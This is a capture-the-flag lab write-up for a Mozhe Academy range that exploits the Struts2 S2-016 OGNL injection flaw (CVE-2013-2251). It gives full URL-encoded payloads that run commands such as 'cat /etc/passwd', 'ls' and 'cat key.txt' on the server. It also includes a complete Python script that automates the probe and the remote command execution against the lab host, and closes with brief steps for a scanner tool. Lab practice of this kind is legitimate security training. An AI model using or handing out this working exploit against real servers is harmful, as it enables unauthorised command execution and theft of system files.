Mozhe Academy lab notes
By shy014
1. Find this target range on Mozhe Academy (墨者学院) and click to start it.
2. Locate a URL ending in .action: http://219.153.49.228:49162/index.action
3. Test whether the vulnerability exists with http://219.153.49.228:49162/index.action?redirect:${1+1}. A `redirect:` parameter prefix that is evaluated as OGNL is Struts2 S2-016 (CVE-2013-2251, Struts 2.0.0 through 2.3.15). Typed raw into the address bar the `+` is decoded as a space, so the expression has to be URL-encoded as in the next step.
4. URL-encoded: http://219.153.49.228:49162/index.action?redirect:%24%7B1%2b1%7D. The server evaluates the expression and answers with a redirect whose Location is built from the result (2) rather than the literal text, which confirms the vulnerability.
5. Use the arbitrary-command-execution EXP. It must be URL-encoded before use (# becomes %23, = becomes %3d), otherwise the browser treats everything after # as a fragment and never sends it:
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
6. Run ls to list the files (same chain, only the command array changes):
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'ls'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
7. The response comes back as a file download; open it and key.txt appears in the listing.
8. Read key.txt (it sits in the working directory that ls listed); the payload again has to be URL-encoded:
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','key.txt'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
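Steps 3 to 8 above are one procedure: probe the `redirect:` prefix with an arithmetic expression, check that the redirect Location carries the evaluated result, then reuse the same ProcessBuilder chain with a different command array and percent-encode the whole thing. The script below is an added example that does exactly that; it is not part of the original write-up or any Struts2 tool. The target URL is the one from the lab, the OGNL chain is the one from step 5, and the `#`/`=`/`+` encoding trap is the reason the write-up keeps repeating "needs URL encoding". Nothing here is tested against a live host; the helpers are pure functions, and `main()` only runs when the script is invoked directly.

```python
import urllib.error
import urllib.parse
import urllib.request

# Lab target copied from the write-up; any other host is your own assumption.
TARGET = "http://219.153.49.228:49162/index.action"

# The OGNL chain from step 5: spawn the command with ProcessBuilder, read its
# stdout into a char buffer, and write that buffer straight into the
# HttpServletResponse so it comes back as the HTTP body.
EXEC_TEMPLATE = (
    "#a=(new java.lang.ProcessBuilder(new java.lang.String[]{{{argv}}})).start(),"
    "#b=#a.getInputStream(),"
    "#c=new java.io.InputStreamReader(#b),"
    "#d=new java.io.BufferedReader(#c),"
    "#e=new char[50000],"
    "#d.read(#e),"
    "#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
    "#matt.getWriter().println(#e),"
    "#matt.getWriter().flush(),"
    "#matt.getWriter().close()"
)


def ognl_exec(argv):
    """Build the command-execution OGNL expression for an argv list.
    Each element becomes one Java String, so 'cat /etc/passwd' must be
    passed as ['cat', '/etc/passwd'], not as a single string."""
    quoted = ",".join("'" + arg.replace("'", "\\'") + "'" for arg in argv)
    return EXEC_TEMPLATE.format(argv=quoted)


def encode_redirect(expr):
    """Wrap an OGNL expression in the S2-016 'redirect:' prefix and
    percent-encode it for use as a query-string parameter name. Encoding
    everything avoids the two traps in the write-up: a bare '#' ends the URL
    as a fragment, and a bare '+' is decoded as a space."""
    return "redirect:" + urllib.parse.quote("${" + expr + "}", safe="")


def make_probe(a=1, b=1):
    """Arithmetic probe (step 3) and the value it should evaluate to."""
    return "%d+%d" % (a, b), str(a + b)


def expression_evaluated(location, expected):
    """True if the redirect Location was built from the evaluated
    expression (e.g. '.../2' for 1+1) rather than the literal '${1+1}'."""
    path = urllib.parse.urlparse(location).path
    last = path.rstrip("/").rsplit("/", 1)[-1]
    return last == expected


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: the Location header itself is the signal."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url, timeout=10):
    """GET without following redirects; return (status, Location, body)."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(url, timeout=timeout)
    except urllib.error.HTTPError as err:  # raised for 3xx/4xx/5xx
        resp = err
    body = resp.read().decode("utf-8", "replace")
    return resp.getcode(), resp.headers.get("Location", ""), body


def main(target=TARGET):
    expr, expected = make_probe(1, 1)
    status, location, _ = fetch(target + "?" + encode_redirect(expr))
    print("probe %s -> HTTP %s Location=%r" % (expr, status, location))
    if not expression_evaluated(location, expected):
        print("expression not evaluated; target does not look vulnerable")
        return
    # Steps 6 and 8: list the directory, then read the key file it revealed.
    for argv in (["ls"], ["cat", "key.txt"]):
        _, _, body = fetch(target + "?" + encode_redirect(ognl_exec(argv)))
        # The 50000-char buffer is NUL-padded by println; strip the padding.
        print("$ %s\n%s" % (" ".join(argv), body.strip("\x00 \r\n")))


if __name__ == "__main__":
    main()
```

Run it as `python3 s2016.py` against the lab host while the range is up. The probe uses a redirect Location rather than the body because `redirect:` never renders a page; if the Location does not end in the evaluated value, stop there, since a WAF or a patched Struts will not evaluate the expression at all.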
II. Using a Struts2 vulnerability detection tool
1. Scan the target with the tool; it reports the vulnerability as present.
2. Execute ls through the tool.
3. Read the value in key.txt.
4. Submit the key.